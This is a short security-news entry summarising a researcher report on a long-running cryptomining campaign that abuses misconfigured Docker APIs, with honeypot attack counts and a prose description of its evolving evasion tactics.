Security News > 2021 > December > Cryptomining Attack Exploits Docker API Misconfiguration Since 2019

The attack technique is script-based and dubbed "Autom", because it exploits the file "Autom.sh".

Attackers have consistently abused the API misconfiguration during the campaign's active period, however the evasion tactics have varied - allowing adversaries to fly under the radar, wrote Aquasec's research arm Team Nautilus in a report published Wednesday.

Attackers hit honeypots set up by Team Nautilus 84 times since 2019, with 22 attacks in 2019, 58 in 2020, and four in 2021 before researchers began writing up their report in October, researchers said.

Though attackers use the same entry point and tactics to achieve their ultimate goal of cryptomining during the attack vector, what changed most about the attack over the years is how threat actors constantly have evolved evasive maneuvers to avoid detection, researchers said.

Attackers also have used five different servers to download the shell script that initiates the attack since they started, they said.

Team Nautilus first observed the attack in 2019 when a malicious command was executed during the run of a vanilla image alpine:latest, which downloaded the autom.

News URL

https://threatpost.com/cryptomining-attack-exploits-docker-api-misconfiguration-since-2019/177299/